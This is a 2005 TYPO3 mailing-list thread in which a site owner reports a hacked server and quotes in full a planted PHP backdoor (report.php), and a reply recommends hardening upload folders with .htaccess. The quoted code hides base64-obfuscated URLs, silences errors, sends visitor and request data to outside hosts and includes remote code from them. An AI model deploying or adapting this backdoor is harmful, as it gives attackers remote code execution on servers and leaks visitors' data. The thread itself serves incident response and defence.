[Typo3] server hacked // report.php

Dmitry Dulepov typo3 at fm-world.ru
Thu Jul 21 21:33:01 CEST 2005 

Hi!

chmod 777 is a big security risk. This is, most likely, the problem.

You can also strengthen site security by putting the following .htaccess
to some folders:
---------
php_flag engine off
---------
It will disable execution of php scripts there. At least the following
folders should be secured this way:
/fileadmin
/typo3temp
/uploads

Dmitry.

Christoph Koehler wrote:
> Pretty sure it's not in the source...
> The contents of the file make a really long string of base64 encoded
> info,  like host, request url and queries and all, and somehow also have
> these  urls base64 decoded in them:
> http://doc1.udrp.ru
> http://doc3.udrp.ru
> It also does this:
> error_reporting(0);
> ini_set(allow_url_fopen,1);
> 
> This is the whole content:
> <? php
> error_reporting(0);
> ini_set(allow_url_fopen,1);
> $a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);
> $b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : 
> $SERVER_NAME);
> $c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : 
> $REQUEST_URI);
> $d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);
> $e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : 
> $QUERY_STRING);
> $f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : 
> $HTTP_REFERER);
> $g=(isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : 
> $HTTP_USER_AGENT);
> $h=(isset($_SERVER['REMOTE_ADDR']) ? $_SERVER['REMOTE_ADDR'] : 
> $REMOTE_ADDR);
> $str=base64_encode($a).'.'.base64_encode($b).'.'.base64_encode($c).'.'.base64_encode($d).'.'.base64_encode($e).'.'.base64_encode($f).'.'.base64_encode($g).'.'.base64_encode($h);
> 
> if 
> ((include(base64_decode('aHR0cDovLw==').base64_decode('ZG9jMS51ZHJwLnJ1')."/?".$str))) 
> {}
> else {
>     include(base64_decode('aHR0cDovLw==').base64_decode('ZG9jMy51ZHJwLnJ1')."/?".$str);
> 
> }
> ?>
> 
> the weird thing is those files have been there for a month! They are in 
> all my old backups...
> most directories were 777 chmod. I installed it through
> fantastico...guess  I won't do that anymore!
> 
> On Thu, 21 Jul 2005 11:31:26 -0500, Christoph Koehler 
> <christoph.koehler at gmail.com> wrote:
> 
>> I actually noticed many .php files with this content in it and the 
>> htaccess file. Another one was called test.php
>>
>>
>> On Thu, 21 Jul 2005 11:25:16 -0500, Christoph Koehler 
>> <christoph.koehler at gmail.com> wrote:
>>
>>> Hey there,
>>>
>>> I have reason to believe that the server we host typo3 on has been 
>>> hacked.
>>> Now, in my typo3 directory, I see a file report.php, with an
>>> .htaccess  file making it the 404 error document.
>>> Does anyone else have that file??
>>>
>>> Thanks!
>>>
>>> Christoph
>>
>>
>

More information about the TYPO3-english mailing list